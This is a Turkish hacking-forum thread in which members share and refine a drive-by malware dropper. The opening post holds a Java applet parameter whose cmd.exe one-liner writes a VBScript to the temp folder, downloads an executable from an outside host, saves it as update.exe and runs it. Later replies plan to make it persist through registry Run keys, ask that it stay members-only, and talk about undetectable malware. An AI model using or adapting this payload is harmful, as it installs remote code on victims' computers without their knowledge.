Direkt Enejkte Az Kaldı
-
- <param name='windows1' value='cmd.exe /c echo Const adTypeBinary = 1 > %temp%\winconfig.vbs & echo Const adSaveCreateOverWrite = 2 >> %temp%\winconfig.vbs & echo Dim S >> %temp%\winconfig.vbs & echo Dim A >> %temp%\winconfig.vbs & echo Dim DTNDTN >> %temp%\winconfig.vbs & echo S = "ADODB" >> %temp%\winconfig.vbs & echo A = ".Stream" >> %temp%\winconfig.vbs & echo Set DTNDTN = CreateObject(S+A) >> %temp%\winconfig.vbs & echo DTNDTN.Type = adTypeBinary >> %temp%\winconfig.vbs & echo DTNDTN.Open >> %temp%\winconfig.vbs & echo DTNDTN.Write BinaryGetURL(Wscript.Arguments(0)) >> %temp%\winconfig.vbs & echo DTNDTN.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> %temp%\winconfig.vbs & echo Function BinaryGetURL(URL) >> %temp%\winconfig.vbs & echo Dim Http >> %temp%\winconfig.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> %temp%\winconfig.vbs & echo Http.Open "GET", URL, False >> %temp%\winconfig.vbs & echo Http.Send >> %temp%\winconfig.vbs & echo BinaryGetURL = Http.ResponseBody >> %temp%\winconfig.vbs & echo End Function >> %temp%\winconfig.vbs & echo Set shell = CreateObject("WScript.Shell") >> %temp%\winconfig.vbs & echo shell.Run "%temp%\update.exe" >> %temp%\winconfig.vbs & start %temp%\winconfig.vbs http://pcdoktor.fileave.com/java.exe %temp%\update.exe'>
- bu kodu biraz derleyip cmd den download yaptırmamız lazım yardım lütfen hocalar :)
-
evet o kodu da hallettim artık cmd den download ve exec yaptırabiliyorum şimdi bunu regedite ekledikmi tamamdır :D
-
son gelişmelerden haberdar ette bizede bi yararı olsun demi
-
emek yoksa yemekte yok :D
yardım bekliyorum :)
-
üyelere özel yapta fazla yayılmasın :D bide kolay gelsin tabi :D
-
Regedit ne ola ki ? Startup a mı eklemek demek yani ? Yoksa başka bişey mi ? Eğer startup'a eklemek ise programa o özelliği ekleyebilirsin koda eklemek yerine madem direkt indirme yapılabiliyor gerisini de program yapsın =)
-
dejnclea bunu yazdı:
-----------------------------
Regedit ne ola ki ? Startup a mı eklemek demek yani ? Yoksa başka bişey mi ? Eğer startup'a eklemek ise programa o özelliği ekleyebilirsin koda eklemek yerine madem direkt indirme yapılabiliyor gerisini de program yapsın =)
-----------------------------anladığım kadarıyla direk indirme yapmıyor cmd den paremetreyle indirme yaptırıp çalıştırıyor. onuda regedite runlara falan yazdırdığı zaman pc yeniden açıldığında o yazdırdığı kod çalışıcak ve download yapıp çalışıcak
-
Bir fud çılgınlığı var forumda ama ilk defa duydum bu terimi, kısaca bir bilgi verebilir misiniz? Ben bu işleri bıraktığımda RFI furyası yeni yeni geçmeye başlıyordu ayıptır söylemesi :D
-
eh hocam public exploiti bulmuşsun buldugun yerde anlatımıda var zaten.
client ile çalışıyor bu virüs.
internette şöle bi arama yaptım
windows1' value='cmd.exe /c echo Const adTypeBinary = 1 java
karşıma 1203120412 tane sonuç çıktı. hemen hemen hepsinddede nasıl kullanılacagı anlatılmış. java client vesaire.